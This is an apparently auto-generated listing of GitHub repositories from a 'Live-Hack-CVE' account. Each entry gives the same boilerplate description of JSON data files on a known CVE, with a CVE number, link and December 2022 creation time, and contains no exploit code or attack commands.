**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3732](https://github.com/Live-Hack-CVE/CVE-2021-3732) create time: 2022-12-22T23:49:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46846 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46846](https://github.com/Live-Hack-CVE/CVE-2021-46846) create time: 2022-12-22T23:49:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3772](https://github.com/Live-Hack-CVE/CVE-2021-3772) create time: 2022-12-22T23:49:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39903 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39903](https://github.com/Live-Hack-CVE/CVE-2022-39903) create time: 2022-12-23T01:15:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39907](https://github.com/Live-Hack-CVE/CVE-2022-39907) create time: 2022-12-23T01:15:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39908 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39908](https://github.com/Live-Hack-CVE/CVE-2022-39908) create time: 2022-12-23T01:14:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39906](https://github.com/Live-Hack-CVE/CVE-2022-39906) create time: 2022-12-23T01:14:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39904 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39904](https://github.com/Live-Hack-CVE/CVE-2022-39904) create time: 2022-12-23T01:14:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39909 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39909](https://github.com/Live-Hack-CVE/CVE-2022-39909) create time: 2022-12-23T01:14:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39910 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39910](https://github.com/Live-Hack-CVE/CVE-2022-39910) create time: 2022-12-23T01:14:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39911](https://github.com/Live-Hack-CVE/CVE-2022-39911) create time: 2022-12-23T01:14:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39912](https://github.com/Live-Hack-CVE/CVE-2022-39912) create time: 2022-12-23T01:14:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39914](https://github.com/Live-Hack-CVE/CVE-2022-39914) create time: 2022-12-23T01:14:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39913](https://github.com/Live-Hack-CVE/CVE-2022-39913) create time: 2022-12-23T01:14:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39915 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39915](https://github.com/Live-Hack-CVE/CVE-2022-39915) create time: 2022-12-23T01:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33187](https://github.com/Live-Hack-CVE/CVE-2022-33187) create time: 2022-12-23T01:13:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46831 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46831](https://github.com/Live-Hack-CVE/CVE-2022-46831) create time: 2022-12-23T01:13:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46830 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46830](https://github.com/Live-Hack-CVE/CVE-2022-46830) create time: 2022-12-23T01:13:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46829 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46829](https://github.com/Live-Hack-CVE/CVE-2022-46829) create time: 2022-12-23T01:13:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46828](https://github.com/Live-Hack-CVE/CVE-2022-46828) create time: 2022-12-23T01:13:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46827](https://github.com/Live-Hack-CVE/CVE-2022-46827) create time: 2022-12-23T01:13:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46826 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46826](https://github.com/Live-Hack-CVE/CVE-2022-46826) create time: 2022-12-23T01:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46770](https://github.com/Live-Hack-CVE/CVE-2022-46770) create time: 2022-12-23T01:13:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46825](https://github.com/Live-Hack-CVE/CVE-2022-46825) create time: 2022-12-23T01:13:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46824](https://github.com/Live-Hack-CVE/CVE-2022-46824) create time: 2022-12-23T01:13:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38599](https://github.com/Live-Hack-CVE/CVE-2022-38599) create time: 2022-12-23T01:13:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45118](https://github.com/Live-Hack-CVE/CVE-2022-45118) create time: 2022-12-23T01:13:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4261](https://github.com/Live-Hack-CVE/CVE-2022-4261) create time: 2022-12-23T01:13:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2993 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2993](https://github.com/Live-Hack-CVE/CVE-2022-2993) create time: 2022-12-23T01:13:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44938](https://github.com/Live-Hack-CVE/CVE-2022-44938) create time: 2022-12-23T01:13:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4291](https://github.com/Live-Hack-CVE/CVE-2022-4291) create time: 2022-12-23T01:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4353 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4353](https://github.com/Live-Hack-CVE/CVE-2022-4353) create time: 2022-12-23T01:12:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39899](https://github.com/Live-Hack-CVE/CVE-2022-39899) create time: 2022-12-23T01:12:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-4609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-4609](https://github.com/Live-Hack-CVE/CVE-2008-4609) create time: 2022-12-22T23:11:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-4296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-4296](https://github.com/Live-Hack-CVE/CVE-2010-4296) create time: 2022-12-22T23:10:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-4295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-4295](https://github.com/Live-Hack-CVE/CVE-2010-4295) create time: 2022-12-22T23:10:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0777](https://github.com/Live-Hack-CVE/CVE-2012-0777) create time: 2022-12-22T22:58:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4121](https://github.com/Live-Hack-CVE/CVE-2016-4121) create time: 2022-12-22T23:10:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4162](https://github.com/Live-Hack-CVE/CVE-2016-4162) create time: 2022-12-22T23:10:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4120](https://github.com/Live-Hack-CVE/CVE-2016-4120) create time: 2022-12-22T23:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4161](https://github.com/Live-Hack-CVE/CVE-2016-4161) create time: 2022-12-22T23:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4163](https://github.com/Live-Hack-CVE/CVE-2016-4163) create time: 2022-12-22T23:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4160](https://github.com/Live-Hack-CVE/CVE-2016-4160) create time: 2022-12-22T23:00:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1002](https://github.com/Live-Hack-CVE/CVE-2016-1002) create time: 2022-12-22T22:59:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0995](https://github.com/Live-Hack-CVE/CVE-2016-0995) create time: 2022-12-22T22:59:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0989 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0989](https://github.com/Live-Hack-CVE/CVE-2016-0989) create time: 2022-12-22T22:59:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1010](https://github.com/Live-Hack-CVE/CVE-2016-1010) create time: 2022-12-22T22:59:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0999](https://github.com/Live-Hack-CVE/CVE-2016-0999) create time: 2022-12-22T22:59:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0994](https://github.com/Live-Hack-CVE/CVE-2016-0994) create time: 2022-12-22T22:58:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0993 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0993](https://github.com/Live-Hack-CVE/CVE-2016-0993) create time: 2022-12-22T22:58:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0963 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0963](https://github.com/Live-Hack-CVE/CVE-2016-0963) create time: 2022-12-22T22:58:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0987 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0987](https://github.com/Live-Hack-CVE/CVE-2016-0987) create time: 2022-12-22T22:58:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0990](https://github.com/Live-Hack-CVE/CVE-2016-0990) create time: 2022-12-22T22:57:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0960 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0960](https://github.com/Live-Hack-CVE/CVE-2016-0960) create time: 2022-12-22T22:57:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0992](https://github.com/Live-Hack-CVE/CVE-2016-0992) create time: 2022-12-22T22:57:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0986](https://github.com/Live-Hack-CVE/CVE-2016-0986) create time: 2022-12-22T22:57:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0962](https://github.com/Live-Hack-CVE/CVE-2016-0962) create time: 2022-12-22T22:57:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0961 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0961](https://github.com/Live-Hack-CVE/CVE-2016-0961) create time: 2022-12-22T22:57:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1005 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1005](https://github.com/Live-Hack-CVE/CVE-2016-1005) create time: 2022-12-22T22:57:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1001](https://github.com/Live-Hack-CVE/CVE-2016-1001) create time: 2022-12-22T22:57:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1000](https://github.com/Live-Hack-CVE/CVE-2016-1000) create time: 2022-12-22T22:57:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0998](https://github.com/Live-Hack-CVE/CVE-2016-0998) create time: 2022-12-22T22:56:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0997](https://github.com/Live-Hack-CVE/CVE-2016-0997) create time: 2022-12-22T22:56:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14465](https://github.com/Live-Hack-CVE/CVE-2017-14465) create time: 2022-12-22T23:11:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14467](https://github.com/Live-Hack-CVE/CVE-2017-14467) create time: 2022-12-22T23:11:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14468 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14468](https://github.com/Live-Hack-CVE/CVE-2017-14468) create time: 2022-12-22T23:11:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17571 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17571](https://github.com/Live-Hack-CVE/CVE-2019-17571) create time: 2022-12-22T22:59:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4231](https://github.com/Live-Hack-CVE/CVE-2019-4231) create time: 2022-12-22T22:59:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19918](https://github.com/Live-Hack-CVE/CVE-2019-19918) create time: 2022-12-22T22:59:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19920](https://github.com/Live-Hack-CVE/CVE-2019-19920) create time: 2022-12-22T22:58:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19922](https://github.com/Live-Hack-CVE/CVE-2019-19922) create time: 2022-12-22T22:57:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11044](https://github.com/Live-Hack-CVE/CVE-2019-11044) create time: 2022-12-22T22:57:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35895](https://github.com/Live-Hack-CVE/CVE-2020-35895) create time: 2022-12-22T22:59:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25086 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25086](https://github.com/Live-Hack-CVE/CVE-2021-25086) create time: 2022-12-22T23:00:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42192 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42192](https://github.com/Live-Hack-CVE/CVE-2021-42192) create time: 2022-12-22T22:59:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3821](https://github.com/Live-Hack-CVE/CVE-2021-3821) create time: 2022-12-22T22:54:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39617](https://github.com/Live-Hack-CVE/CVE-2021-39617) create time: 2022-12-22T22:53:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39660 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39660](https://github.com/Live-Hack-CVE/CVE-2021-39660) create time: 2022-12-22T22:53:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0934](https://github.com/Live-Hack-CVE/CVE-2021-0934) create time: 2022-12-22T22:51:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0685](https://github.com/Live-Hack-CVE/CVE-2022-0685) create time: 2022-12-22T23:10:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0729](https://github.com/Live-Hack-CVE/CVE-2022-0729) create time: 2022-12-22T23:10:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0943](https://github.com/Live-Hack-CVE/CVE-2022-0943) create time: 2022-12-22T23:10:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1154 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1154](https://github.com/Live-Hack-CVE/CVE-2022-1154) create time: 2022-12-22T23:10:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20686](https://github.com/Live-Hack-CVE/CVE-2022-20686) create time: 2022-12-22T23:10:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1048](https://github.com/Live-Hack-CVE/CVE-2022-1048) create time: 2022-12-22T23:00:47Z

